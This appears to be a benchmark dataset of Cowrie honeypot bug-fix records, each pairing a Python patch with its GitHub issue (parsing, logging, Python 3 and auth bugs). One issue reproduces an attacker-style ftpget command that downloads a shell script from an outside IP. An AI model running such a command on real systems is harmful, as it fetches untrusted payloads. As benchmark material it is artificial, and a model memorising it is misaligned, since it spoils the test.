-43,9 +43,6 @@ def __init__(self, instream=None, infile=None, posix=False, self.commenters = '#' self.wordchars = ('abcdfeghijklmnopqrstuvwxyz' 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_') - if self.posix: - self.wordchars += ('ßàáâãäåæçèéêëìíîïðñòóôõöøùúûüýþÿ' - 'ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖØÙÚÛÜÝÞ') self.whitespace = ' \t\r\n' self.whitespace_split = False self.quotes = '\'"'
diff --git a/src/cowrie/test/test_echo.py b/src/cowrie/test/test_echo.py --- a/src/cowrie/test/test_echo.py +++ b/src/cowrie/test/test_echo.py @@ -115,5 +115,12 @@ def test_echo_command_012(self): self.proto.lineReceived(b'echo test > test012; grep test test012') self.assertEquals(self.tr.value(), b'test\n' + PROMPT) + def test_echo_command_013(self): + """ + echo "ls""ls" + """ + self.proto.lineReceived(b'echo "ls""ls"') + self.assertEquals(self.tr.value(), b'lsls\n' + PROMPT) + def tearDown(self): self.proto.connectionLost("tearDown From Unit Test")
Quote parsing bug Output from command: ``` echo "Z""IGAZAGA148""8" ``` Is on Cowrie: ``` Z" "IGAZAGA148" "8 ``` On normal system: ``` ZIGAZAGA1488 ```
2018-09-16T10:40:08
cowrie/cowrie
897
cowrie__cowrie-897
[ "896" ]
fb160f0a09e18eb3c1493260661be704ea464c16
diff --git a/src/cowrie/output/mysql.py b/src/cowrie/output/mysql.py --- a/src/cowrie/output/mysql.py +++ b/src/cowrie/output/mysql.py @@ -118,7 +118,7 @@ def write(self, entry): (entry["session"], 1, entry['username'], entry['password'], entry["time"])) elif entry["eventid"] == 'cowrie.login.failed': - self.simpleQuery('INSERT INTO `auth` (`session`, `success` `username`, `password`, `timestamp`) ' + self.simpleQuery('INSERT INTO `auth` (`session`, `success`, `username`, `password`, `timestamp`) ' 'VALUES (%s, %s, %s, %s, FROM_UNIXTIME(%s))', (entry["session"], 0, entry['username'], entry['password'], entry["time"]))
Mysql output has incorrect sql query in line 121 line 120-121 of src/cowrie/output/mysql.py show: ``` elif entry["eventid"] == 'cowrie.login.failed': self.simpleQuery('INSERT INTO `auth` (`session`, `success` `username`, `password`, `timestamp`) ' ``` There is a missing comma between `success` & `username`. This results in failure to log failed login attempts to mysql.
2018-09-20T15:31:52
cowrie/cowrie
920
cowrie__cowrie-920
[ "917" ]
7653869e1f46e1397c02fac97ade023a29cb9d89
diff --git a/src/cowrie/output/localsyslog.py b/src/cowrie/output/localsyslog.py --- a/src/cowrie/output/localsyslog.py +++ b/src/cowrie/output/localsyslog.py @@ -53,6 +53,9 @@ def stop(self): pass def write(self, logentry): + if 'isError' not in logentry: + logentry['isError'] = False + if self.format == 'cef': self.syslog.emit({ 'message': cowrie.core.cef.formatCef(logentry),
output_localsyslog exceptions.KeyError: 'isError' After pulling the most recent version of cowrie to some of my honeypots, I get this error when a new connection I enabled [output_localsyslog] with configuration below: ``` [output_localsyslog] enabled = true facility = LOCAL5 format = text ``` The log error shows this: ``` 2018-10-11T18:29:01.778300+0000 [twisted.logger._observer#critical] Temporarily disabling observer LegacyLogObserverWrapper(<bound method Output.emit of <cowrie.output.localsyslog.Output object at 0xb55ae7b0>>) due to exception: [Failure instance: Traceback: <type 'exceptions.KeyError'>: 'isError' /opt/cowrie/src/cowrie/core/checkers.py:110:checkUserPass /opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/python/threadable.py:53:sync /opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/python/log.py:286:msg /opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/logger/_legacy.py:154:publishToNewObserver --- <exception caught here> --- /opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/logger/_observer.py:131:__call__ /opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/logger/_legacy.py:93:__call__ /opt/cowrie/src/cowrie/core/output.py:209:emit /opt/cowrie/src/cowrie/output/localsyslog.py:65:write /opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/python/syslog.py:76:emit ] Traceback (most recent call last): File "/opt/cowrie/src/cowrie/core/checkers.py", line 110, in checkUserPass password=thepassword) File "/opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/python/threadable.py", line 53, in sync return function(self, *args, **kwargs) File "/opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/python/log.py", line 286, in msg _publishNew(self._publishPublisher, actualEventDict, textFromEventDict) File "/opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/logger/_legacy.py", line 154, in publishToNewObserver observer(eventDict) --- <exception caught here> --- File "/opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/logger/_observer.py", line 131, in __call__ observer(event) File "/opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/logger/_legacy.py", line 93, in __call__ self.legacyObserver(event) File "/opt/cowrie/src/cowrie/core/output.py", line 209, in emit self.write(ev) File "/opt/cowrie/src/cowrie/output/localsyslog.py", line 65, in write self.syslog.emit(logentry) File "/opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/python/syslog.py", line 76, in emit if eventDict['isError']: exceptions.KeyError: 'isError' ```
an other error releated: ``` 2018-10-11T18:52:00.840372+0000 [twisted.logger._observer#critical] Temporarily disabling observer LegacyLogObserverWrapper(<bound method Output.emit of <cowrie.output.localsyslog.Output object at 0xb559fed0>>) due to exception: [Failure instance: Traceback: <type 'exceptions.KeyError'>: 'isError' /opt/cowrie/src/cowrie/telnet/transport.py:244:connectionLost /opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/python/threadable.py:53:sync /opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/python/log.py:286:msg /opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/logger/_legacy.py:154:publishToNewObserver --- <exception caught here> --- /opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/logger/_observer.py:131:__call__ /opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/logger/_legacy.py:93:__call__ /opt/cowrie/src/cowrie/core/output.py:209:emit /opt/cowrie/src/cowrie/output/localsyslog.py:65:write /opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/python/syslog.py:76:emit ] Traceback (most recent call last): File "/opt/cowrie/src/cowrie/telnet/transport.py", line 244, in connectionLost duration=duration) File "/opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/python/threadable.py", line 53, in sync return function(self, *args, **kwargs) File "/opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/python/log.py", line 286, in msg _publishNew(self._publishPublisher, actualEventDict, textFromEventDict) File "/opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/logger/_legacy.py", line 154, in publishToNewObserver observer(eventDict) --- <exception caught here> --- File "/opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/logger/_observer.py", line 131, in __call__ observer(event) File "/opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/logger/_legacy.py", line 93, in __call__ self.legacyObserver(event) File "/opt/cowrie/src/cowrie/core/output.py", line 209, in emit self.write(ev) File "/opt/cowrie/src/cowrie/output/localsyslog.py", line 65, in write self.syslog.emit(logentry) File "/opt/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/python/syslog.py", line 76, in emit if eventDict['isError']: exceptions.KeyError: 'isError' ``` hi! you're using text output, I assume? Try modifying `src/cowrie/output/localsyslog.py` so the last lines look like this: ``` # message appears with additional spaces if message key is defined logentry['message'] = [logentry['message']] if 'isError' not in logentry: logentry['isError'] = False self.syslog.emit(logentry) ``` If that works, please let me know! Hi @micheloosterhof, sorry for my bad redaction. Thanks for your help, apparently it's works well. Ok! I'll put that in the main code then.
2018-10-13T07:00:30
cowrie/cowrie
993
cowrie__cowrie-993
[ "976" ]
6168584a29c092f89e497b9cdf0dd87a44f82fff
diff --git a/src/cowrie/commands/ping.py b/src/cowrie/commands/ping.py --- a/src/cowrie/commands/ping.py +++ b/src/cowrie/commands/ping.py @@ -67,7 +67,7 @@ def start(self): self.write('ping: unknown host %s\n' % (self.host,)) self.exit() else: - s = hashlib.md5(self.host).hexdigest() + s = hashlib.md5((self.host).encode("utf-8")).hexdigest() self.ip = '.'.join([str(int(x, 16)) for x in (s[0:2], s[2:4], s[4:6], s[6:8])]) self.running = True
pinging a domain crashes From within cowrie (docker current 7 Dec 2018), when the you ping a domain (not an IP) a stack trace errors shown below. Cowrie freezes., and since many bots use ping as info gathering/sandbox detection, cowry may miss everything subsequent to this command. Environment: Ubuntu 16.04 Python 3.5.2 docker pull cowrie/cowrie sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222 docker run -it -p 2222:2222 -p 2223:2223 cowrie/cowrie ``` 2018-12-07T04:56:59+0000 [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,2,172.17.0.1] gett ing shell 2018-12-07T04:57:07+0000 [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,2,172.17.0.1] CMD: **ping google.com** 2018-12-07T04:57:07+0000 [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,2,172.17.0.1] Comm and found: ping google.com 2018-12-07T04:57:07+0000 [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,2,172.17.0.1] Unha ndled Error Traceback (most recent call last): File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/python/context.py", line 122, in callWithContext return self.currentContext().callWithContext(ctx, func, *args, **kw) File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/python/context.py", line 85, in callWithContext return func(*args,**kw) File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/conch/ssh/service.py", line 45, in packetReceived return f(packet) File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/conch/ssh/connection.py", line 249, in ssh_CHANNEL_D ATA log.callWithLogger(channel, channel.dataReceived, data) --- <exception caught here> --- File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/python/log.py", line 103, in callWithLogger return callWithContext({"system": lp}, func, *args, **kw) File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/python/log.py", line 86, in callWithContext return context.call({ILogContext: newCtx}, func, *args, **kw) File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/python/context.py", line 122, in callWithContext return self.currentContext().callWithContext(ctx, func, *args, **kw) File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/python/context.py", line 85, in callWithContext return func(*args,**kw) File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/conch/ssh/session.py", line 112, in dataReceived self.client.transport.write(data) File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/conch/ssh/session.py", line 163, in write self.proto.dataReceived(data) File "/cowrie/cowrie-git/src/cowrie/insults/insults.py", line 104, in dataReceived insults.ServerProtocol.dataReceived(self, data) File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/conch/insults/insults.py", line 537, in dataReceived self.terminalProtocol.keystrokeReceived(ch, None) File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/conch/recvline.py", line 225, in keystrokeReceived m() File "/cowrie/cowrie-git/src/cowrie/shell/protocol.py", line 325, in handle_RETURN return recvline.RecvLine.handle_RETURN(self) File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/conch/recvline.py", line 292, in handle_RETURN self.lineReceived(line) File "/cowrie/cowrie-git/src/cowrie/shell/protocol.py", line 185, in lineReceived self.cmdstack[-1].lineReceived(line) File "/cowrie/cowrie-git/src/cowrie/shell/honeypot.py", line 106, in lineReceived self.runCommand() File "/cowrie/cowrie-git/src/cowrie/shell/honeypot.py", line 215, in runCommand self.protocol.call_command(pp, cmdclass, *cmd_array[0]['rargs']) File "/cowrie/cowrie-git/src/cowrie/shell/protocol.py", line 306, in call_command HoneyPotBaseProtocol.call_command(self, pp, cmd, *args) File "/cowrie/cowrie-git/src/cowrie/shell/protocol.py", line 194, in call_command obj.start() File "/cowrie/cowrie-git/src/cowrie/commands/ping.py", line 70, in start s = hashlib.md5(self.host).hexdigest() builtins.TypeError: Unicode-objects must be encoded before hashing ```
It seems to be a unicode issue on Py3.
2019-01-27T04:40:46
cowrie/cowrie
994
cowrie__cowrie-994
[ "975" ]
6168584a29c092f89e497b9cdf0dd87a44f82fff
diff --git a/src/cowrie/commands/free.py b/src/cowrie/commands/free.py --- a/src/cowrie/commands/free.py +++ b/src/cowrie/commands/free.py @@ -57,7 +57,7 @@ def do_free(self, fmt='kilobytes'): if fmt == 'megabytes': # Transform KB to MB - for key, value in raw_mem_stats.iteritems(): + for key, value in raw_mem_stats.items(): raw_mem_stats[key] = int(value / 1000) elif fmt == 'human': magnitude = ["B", "M", "G", "T", "Z"]
free -m command results in stack trace and cowrie freezes From within cowrie (docker current 7 Dec 2018), when the command "free -m" is run it results a stack trace errors shown below. Cowrie freezes., and since many bots use free as info gathering, cowry may miss everything subsequent to this command. Environment: Ubuntu 16.04 Python 3.5.2 docker pull cowrie/cowrie sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222 docker run -it -p 2222:2222 -p 2223:2223 cowrie/cowrie Console Error: 2018-12-07T04:53:52+0000 [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,1,172.17.0 .1] CMD: free -m 2018-12-07T04:53:52+0000 [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,1,172.17.0 .1] Command found: free -m 2018-12-07T04:53:52+0000 [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,1,172.17.0 .1] Unhandled Error Traceback (most recent call last): File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/python/context.py", line 122, in callWithCon text return self.currentContext().callWithContext(ctx, func, *args, **kw) File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/python/context.py", line 85, in callWithCont ext return func(*args,**kw) File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/conch/ssh/service.py", line 45, in packetRec eived return f(packet) File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/conch/ssh/connection.py", line 249, in ssh_C HANNEL_DATA log.callWithLogger(channel, channel.dataReceived, data) --- <exception caught here> --- File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/python/log.py", line 103, in callWithLogger return callWithContext({"system": lp}, func, *args, **kw) File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/python/log.py", line 86, in callWithContext return context.call({ILogContext: newCtx}, func, *args, **kw) File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/python/context.py", line 122, in callWithCon text return self.currentContext().callWithContext(ctx, func, *args, **kw) File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/python/context.py", line 85, in callWithCont ext return func(*args,**kw) File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/conch/ssh/session.py", line 112, in dataRece ived self.client.transport.write(data) File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/conch/ssh/session.py", line 163, in write self.proto.dataReceived(data) File "/cowrie/cowrie-git/src/cowrie/insults/insults.py", line 104, in dataReceived insults.ServerProtocol.dataReceived(self, data) File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/conch/insults/insults.py", line 537, in data Received self.terminalProtocol.keystrokeReceived(ch, None) File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/conch/recvline.py", line 225, in keystrokeRe ceived m() File "/cowrie/cowrie-git/src/cowrie/shell/protocol.py", line 325, in handle_RETURN return recvline.RecvLine.handle_RETURN(self) File "/cowrie/cowrie-env/lib/python3.5/site-packages/twisted/conch/recvline.py", line 292, in handle_RETU RN self.lineReceived(line) File "/cowrie/cowrie-git/src/cowrie/shell/protocol.py", line 185, in lineReceived self.cmdstack[-1].lineReceived(line) File "/cowrie/cowrie-git/src/cowrie/shell/honeypot.py", line 106, in lineReceived self.runCommand() File "/cowrie/cowrie-git/src/cowrie/shell/honeypot.py", line 215, in runCommand self.protocol.call_command(pp, cmdclass, *cmd_array[0]['rargs']) File "/cowrie/cowrie-git/src/cowrie/shell/protocol.py", line 306, in call_command HoneyPotBaseProtocol.call_command(self, pp, cmd, *args) File "/cowrie/cowrie-git/src/cowrie/shell/protocol.py", line 194, in call_command obj.start() File "/cowrie/cowrie-git/src/cowrie/shell/command.py", line 128, in start self.call() File "/cowrie/cowrie-git/src/cowrie/commands/free.py", line 41, in call self.do_free(fmt='megabytes') File "/cowrie/cowrie-git/src/cowrie/commands/free.py", line 60, in do_free for key, value in raw_mem_stats.iteritems(): builtins.AttributeError: 'dict' object has no attribute 'iteritems'
2019-01-27T04:51:36
cowrie/cowrie
1,002
cowrie__cowrie-1002
[ "988" ]
73f0db7540e428dd9a8d28ec3d2f9bd820b8c95e
diff --git a/src/cowrie/commands/ftpget.py b/src/cowrie/commands/ftpget.py --- a/src/cowrie/commands/ftpget.py +++ b/src/cowrie/commands/ftpget.py @@ -21,7 +21,7 @@ class FTP(ftplib.FTP): def __init__(self, *args, **kwargs): self.source_address = kwargs.pop("source_address", None) - super(FTP, self).__init__(*args, **kwargs) + ftplib.FTP.__init__(self, *args, **kwargs) def connect(self, host='', port=0, timeout=-999, source_address=None): if host != '':
ftpget on python2 ``` File "/home/cowrie/cowrie/src/cowrie/commands/ftpget.py", line 200, in ftp_download ftp = FTP(source_address=out_addr) File "/home/cowrie/cowrie/src/cowrie/commands/ftpget.py", line 24, in __init__ super(FTP, self).__init__(*args, **kwargs) exceptions.TypeError: super() argument 1 must be type, not classobj ```
@micheloosterhof Can you please provide some other info, as in how to trigger this error? It's actually Python2! Run: ```ftpget -v -u anonymous -p anonymous -P 21 89.46.223.247 8UsA1.sh 8UsA1.sh``` Output: ``` 2019-01-28T07:38:45.678356+0000 [SSHChannel session (0) on SSHService 'ssh-connection' on HoneyPotSSHTransport,1,127.0. 0.1] Command found: ftpget -v -u anonymous -p anonymous -P 21 89.46.223.247 8UsA1.sh 8UsA1.sh 2019-01-28T07:38:45.681785+0000 [SSHChannel session (0) on SSHService 'ssh-connection' on HoneyPotSSHTransport,1,127.0. 0.1] Unhandled Error Traceback (most recent call last): File "/home/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/python/context.py", line 122, in call WithContext return self.currentContext().callWithContext(ctx, func, *args, **kw) File "/home/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/python/context.py", line 85, in callW ithContext return func(*args,**kw) File "/home/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/conch/ssh/service.py", line 45, in pa cketReceived return f(packet) File "/home/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/conch/ssh/connection.py", line 249, i n ssh_CHANNEL_DATA log.callWithLogger(channel, channel.dataReceived, data) --- <exception caught here> --- File "/home/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/python/log.py", line 103, in callWith Logger return callWithContext({"system": lp}, func, *args, **kw) File "/home/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/python/log.py", line 86, in callWithC ontext return context.call({ILogContext: newCtx}, func, *args, **kw) File "/home/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/python/context.py", line 122, in call WithContext return self.currentContext().callWithContext(ctx, func, *args, **kw) File "/home/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/python/context.py", line 85, in callW ithContext return func(*args,**kw) File "/home/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/conch/ssh/session.py", line 112, in d ataReceived self.client.transport.write(data) File "/home/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/conch/ssh/session.py", line 163, in w rite self.proto.dataReceived(data) File "/home/cowrie/cowrie/src/cowrie/insults/insults.py", line 104, in dataReceived insults.ServerProtocol.dataReceived(self, data) File "/home/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/conch/insults/insults.py", line 537, in dataReceived self.terminalProtocol.keystrokeReceived(ch, None) File "/home/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/conch/recvline.py", line 225, in keys trokeReceived m() File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 325, in handle_RETURN return recvline.RecvLine.handle_RETURN(self) File "/home/cowrie/cowrie-env/local/lib/python2.7/site-packages/twisted/conch/recvline.py", line 292, in hand le_RETURN self.lineReceived(line) File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 185, in lineReceived self.cmdstack[-1].lineReceived(line) File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 106, in lineReceived self.runCommand() File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 215, in runCommand self.protocol.call_command(pp, cmdclass, *cmd_array[0]['rargs']) File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 306, in call_command HoneyPotBaseProtocol.call_command(self, pp, cmd, *args) File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 194, in call_command obj.start() File "/home/cowrie/cowrie/src/cowrie/commands/ftpget.py", line 160, in start result = self.ftp_download() File "/home/cowrie/cowrie/src/cowrie/commands/ftpget.py", line 200, in ftp_download ftp = FTP(source_address=out_addr) File "/home/cowrie/cowrie/src/cowrie/commands/ftpget.py", line 24, in __init__ super(FTP, self).__init__(*args, **kwargs) exceptions.TypeError: super() argument 1 must be type, not classobj
2019-01-28T15:24:05
cowrie/cowrie
1,022
cowrie__cowrie-1022
[ "1007" ]
8e16db0d247566e00f184e703c1ec843a894b7c5
diff --git a/src/cowrie/core/config.py b/src/cowrie/core/config.py --- a/src/cowrie/core/config.py +++ b/src/cowrie/core/config.py @@ -8,7 +8,8 @@ from __future__ import absolute_import, division import configparser -import os +from os import environ +from os.path import abspath, dirname, exists, join def to_environ_key(key): @@ -18,15 +19,16 @@ def to_environ_key(key): class EnvironmentConfigParser(configparser.ConfigParser): def has_option(self, section, option): - if to_environ_key('_'.join((section, option))) in os.environ: + if to_environ_key('_'.join((section, option))) in environ: return True return super(EnvironmentConfigParser, self).has_option(section, option) def get(self, section, option, **kwargs): key = to_environ_key('_'.join((section, option))) - if key in os.environ: - return os.environ[key] - return super(EnvironmentConfigParser, self).get(section, option, **kwargs) + if key in environ: + return environ[key] + return super(EnvironmentConfigParser, self).get( + section, option, **kwargs) def readConfigFile(cfgfile): @@ -36,9 +38,26 @@ def readConfigFile(cfgfile): @param cfgfile: filename or array of filenames @return: ConfigParser object """ - parser = EnvironmentConfigParser(interpolation=configparser.ExtendedInterpolation()) + parser = EnvironmentConfigParser( + interpolation=configparser.ExtendedInterpolation()) parser.read(cfgfile) return parser -CONFIG = readConfigFile(("etc/cowrie.cfg.dist", "/etc/cowrie/cowrie.cfg", "etc/cowrie.cfg", "cowrie.cfg")) +def get_config_path(): + """Get absolute path to the config file + """ + config_files = ["etc/cowrie/cowrie.cfg", "etc/cowrie.cfg", + "cowrie.cfg", "etc/cowrie.cfg.dist"] + current_path = abspath(dirname(__file__)) + root = "/".join(current_path.split("/")[:-3]) + + for file in config_files: + absolute_path = join(root, file) + if exists(absolute_path): + return absolute_path + + print("Config file not found") + + +CONFIG = readConfigFile(get_config_path())
Cowrie not set up for py.test framework So I tried running the test in both python2 and python3. For python2 all the tests were passing but for python3 there was some error. ``` py.test --cov=cowrie ===================================================================================== test session starts ===================================================================================== platform linux -- Python 3.7.2, pytest-4.2.0, py-1.7.0, pluggy-0.8.1 rootdir: /home/mzfr/dev/cowrie, inifile: plugins: cov-2.6.1 collected 3 items / 3 errors =========================================================================================== ERRORS ============================================================================================ ___________________________________________________________________ ERROR collecting src/cowrie/test/test_base_commands.py ____________________________________________________________________ ../shell/fs.py:26: in <module> PICKLE = pickle.load(open(CONFIG.get('shell', 'filesystem'), 'rb')) ../core/config.py:29: in get return super(EnvironmentConfigParser, self).get(section, option, **kwargs) /usr/lib/python3.7/configparser.py:780: in get d = self._unify_values(section, vars) /usr/lib/python3.7/configparser.py:1146: in _unify_values raise NoSectionError(section) from None E configparser.NoSectionError: No section: 'shell' During handling of the above exception, another exception occurred: test_base_commands.py:12: in <module> from cowrie.shell import protocol ../shell/protocol.py:21: in <module> from cowrie.shell import command ../shell/command.py:20: in <module> from cowrie.shell import fs ../shell/fs.py:29: in <module> exit(2) /usr/lib/python3.7/_sitebuiltins.py:26: in __call__ raise SystemExit(code) E SystemExit: 2 --------------------------------------------------------------------------------------- Captured stdout --------------------------------------------------------------------------------------- ERROR: Config file not found: etc/cowrie.cfg.dist ________________________________________________________________________ ERROR collecting src/cowrie/test/test_echo.py ________________________________________________________________________ ../shell/fs.py:26: in <module> PICKLE = pickle.load(open(CONFIG.get('shell', 'filesystem'), 'rb')) ../core/config.py:29: in get return super(EnvironmentConfigParser, self).get(section, option, **kwargs) /usr/lib/python3.7/configparser.py:780: in get d = self._unify_values(section, vars) /usr/lib/python3.7/configparser.py:1146: in _unify_values raise NoSectionError(section) from None E configparser.NoSectionError: No section: 'shell' During handling of the above exception, another exception occurred: test_echo.py:16: in <module> from cowrie.shell import protocol ../shell/protocol.py:21: in <module> from cowrie.shell import command ../shell/command.py:20: in <module> from cowrie.shell import fs ../shell/fs.py:29: in <module> exit(2) /usr/lib/python3.7/_sitebuiltins.py:26: in __call__ raise SystemExit(code) E SystemExit: 2 --------------------------------------------------------------------------------------- Captured stdout --------------------------------------------------------------------------------------- ERROR: Config file not found: etc/cowrie.cfg.dist ________________________________________________________________________ ERROR collecting src/cowrie/test/test_tftp.py ________________________________________________________________________ ../shell/fs.py:26: in <module> PICKLE = pickle.load(open(CONFIG.get('shell', 'filesystem'), 'rb')) ../core/config.py:29: in get return super(EnvironmentConfigParser, self).get(section, option, **kwargs) /usr/lib/python3.7/configparser.py:780: in get d = self._unify_values(section, vars) /usr/lib/python3.7/configparser.py:1146: in _unify_values raise NoSectionError(section) from None E configparser.NoSectionError: No section: 'shell' During handling of the above exception, another exception occurred: test_tftp.py:16: in <module> from cowrie.shell import protocol ../shell/protocol.py:21: in <module> from cowrie.shell import command ../shell/command.py:20: in <module> from cowrie.shell import fs ../shell/fs.py:29: in <module> exit(2) /usr/lib/python3.7/_sitebuiltins.py:26: in __call__ raise SystemExit(code) E SystemExit: 2 --------------------------------------------------------------------------------------- Captured stdout --------------------------------------------------------------------------------------- ERROR: Config file not found: etc/cowrie.cfg.dist ```
Hi! So far we are running `Twisted Trial` as the unit testing framework. There are multiple frameworks around in Python, if there's a need to switch, then we should make a selection, but so far we are using Twisted Trial. I'm curious though because most of it seemed to work on Py2 but not Py3? The file system issues you are having with directory paths should be the same on both versions of Python. This is because of the config file problem. Right now we don't have an absolute path for the config files which cause the problem. If we change the [Line 44](https://github.com/cowrie/cowrie/blob/master/src/cowrie/core/config.py#L44) from ```python CONFIG = readConfigFile(("etc/cowrie.cfg.dist", "/etc/cowrie/cowrie.cfg", "etc/cowrie.cfg", "cowrie.cfg")) ``` to ```python CONFIG = readConfigFile(("/home/mzfr/dev/cowrie/etc/cowrie.cfg")) ``` This works fine.
2019-02-24T08:25:18
cowrie/cowrie
1,030
cowrie__cowrie-1030
[ "797" ]
d8d9a5db55ac0d996d76893d6c6de1f6d27cb430
diff --git a/src/cowrie/core/auth.py b/src/cowrie/core/auth.py --- a/src/cowrie/core/auth.py +++ b/src/cowrie/core/auth.py @@ -98,7 +98,7 @@ def adduser(self, login, passwd): """ login = self.re_or_str(login) - if passwd[0] == b'!': + if passwd[0] == ord("!"): policy = False passwd = passwd[1:] else:
adding root:x:!password to userdb.txt doesn't exclude root/password as valid credentials Fresh install. I tried to exclude 'password' or 'abc123' from valid passwords for the user root Now file looks like ``` root:x:!root root:x:!123456 root:x:!password root:x:* ``` Retarted cowrie, but no way to deny login with root/password credentials Maybe, some sort of problem with new regexp checking?
That used to work, maybe that stopped working with the new regex patch indeed. Hello @supriyo-biswas In your patch https://github.com/micheloosterhof/cowrie/pull/763 we lost the ability to negate passwords starting with '!'. Any ideas on how to do this with regex? Yep, experiencing the same issue here. I looked through the file and nothing stood out to me. If this doesn't get resolved I'll have more time to look at it tomorrow night. seems to be an ordering issue, #802 should fix it Same problem for me but not solve by the patch Same problem, not solved by patch Reopened. @micheloosterhof I think I found what is causing the problem here. In [auth.py Line 101](https://github.com/cowrie/cowrie/blob/master/src/cowrie/core/auth.py#L101) we are checking ```python if passwd[0] == b'!': ``` but the problem is that `passwd` is a byte so `passwd[0]` would give us the value of the character on the 0 indexes. Ex: ```python >>> p b'!123456' >>> p[0] 33 >>> ord("!") 33 ``` So instead of checking for `b"!"` we need to check for it's `ord("!")`. ```python if passwd[0] == ord("!"): ``` P.S: This is again python2/python3 issue :)
2019-03-01T18:37:16
cowrie/cowrie
1,049
cowrie__cowrie-1049
[ "493", "493" ]
ce6452c204b7e9026383ae85e0e34b1cdb0688c7
